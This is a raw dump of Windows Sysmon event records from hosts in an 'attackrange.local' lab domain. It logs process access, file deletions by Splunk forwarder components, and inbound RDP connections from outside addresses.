09:05:29.357{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977517Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.357{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8959-6151-9B79-00000000FD01}2500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977516Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.357{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8959-6151-9B79-00000000FD01}2500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977515Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.342{69CF5F33-8959-6151-9B79-00000000FD01}2500C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977531Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:30.919{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7A0B8A4448F3CA6A4201B91FC6D2A73,SHA256=A7525312B11D7831921E8A3660B822EB4F46F73A109869F6008D31141B2463E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048835Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:28.286{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-49183-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001048834Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:28.020{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60759-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048833Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:30.228{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB9F0B31D57CB2CA3205C59FAF4C577B,SHA256=5567C4B0E2ADF3EF7FE6F7B8338F0C284AA423D2A1907EC19A1263269E9735A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048839Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:31.289{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AC7DC294EDAB05E488F096F9B0455C4,SHA256=F153B3F9B6511BEEDDD294512727C82A11707ACC68BCED725C0A78B022CF9B3E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977534Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.604{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59284-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000977533Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:28.316{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-57596-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977532Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:31.482{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B02F3300E51CEF5FC19E6B9EBE047C34,SHA256=58230CD0B563C7848FAD093559504307B51AEC844DA602445E5CC436C49B88D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048838Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:31.207{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048837Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:31.206{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048836Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:31.206{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048841Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:32.541{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=B64CE76A2E29FBCB00F29CB03C38C4F9,SHA256=B95F798392928258F5A42F20897BDBAA231D88B41AF4B1EA7E027BCF0E4474B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048840Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:32.306{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2E84E4E00B743AF2FF6F86D052D1093,SHA256=0BBCB30FEAA5B3D6BA29C36ED19D93365071A37E0AA861C4A8620CCA93F00F88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977536Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:32.497{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=79A46BBAB59DF7ECB3CBDD40AD461678,SHA256=501CBC8B5169CC4A15D930F5904C64CD7C3D0DD4A4B8A4E588152E86C8A56A99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977535Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:32.154{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A4840CEAAD7F1AB3C2D1047CC83A188,SHA256=40B4F53B4821EA13C97FBB332DAC709CEE60417103AD5947BEC13E7F3F0C9B70,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977538Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:29.814{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59307-false10.0.1.12-8000- 23542300x8000000000000000977537Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:33.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FC6FFC9F5A1CAA85A6FB474C12DF9A2,SHA256=DC29DE8C2158AFE178FA02FADFC038EBD6D689FE41E96F414D758D31B64D43EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048842Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:33.340{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3B5523BB6D702471A57EE384A228233,SHA256=4DA6CF0F8337D30F7A5F119CAE9C1A1B02A7BF7D7A32CAF86809ABE825B22E1A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977540Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:31.465{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-11413-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977539Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:34.591{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77D57A56495341203A7176C48E98540B,SHA256=9A986EAD7A25301940565689F01219D2D2C26E8EF26D5582B56A6F5521843814,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048844Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:32.795{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53267-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048843Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:34.371{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04F82C45126BDE25D822956FE7894F84,SHA256=4748C8988911F222087F04AB088543E1D47B7D37E564B4A16B2CB22477CA8D09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977541Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:35.607{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76D00BD8A77F0CA7D4112F4A6307AA47,SHA256=00D02F052BD45F9D31822563238BFAEB0F16D11E49A1B8E9C3684661707116C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048849Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:35.955{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=A0BD835E0DD1FFDE0F054BC51A3DD10B,SHA256=7FC9DBDD49BB829249853D095F9ED5877F7D3DE1A03E80F389B25644E78CEEB5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048848Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:33.264{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-61555-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001048847Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:35.387{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=385A227AD41E56CC10D225B0B01D003F,SHA256=5C09760E898C5CFEF48EC29A8FA09D66DFFAAB54547CD486538CD7EBECB758E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048846Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:35.355{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F5C802557E9A7E6669F80C2420303E2C,SHA256=246A1451E64D99C7B4E27D0B65934D8A42029559440589A06ACA95C167656365,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048845Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:35.355{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1836191B6C954DFAB6E7278C33C74AA,SHA256=D6F68C34FC1F72A8D4BFC0C4BC60F3101303F2851C9ADD5325FC6462A972F8A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000977544Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:34.360{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-50147-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000977543Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:36.622{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAFEB72BFC19ECD1BB8072C898A467E9,SHA256=1886003376BB2115557D6C80C3F2DA3222418F4E48A62388C2EC9660CEC33E45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048851Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:36.487{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048850Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:05:36.387{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0ED915773161E93C9EB5B0E4CB111B,SHA256=AF9AE896BDF50859FBC116BB3C50EC172BCD0F20EB78A84E4D3C5794B8759621,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977542Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:36.419{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14F96A9E0CCB6B6FAA31B94A22C578EB,SHA256=237D1DAD7BB810CC96427DF0BEB22AFA49B2118F2994B649037C334B437AB896,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977558Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.763{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8961-6151-9C79-00000000FD01}2296C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977557Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977556Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977555Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977554Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:05:37.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977553Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 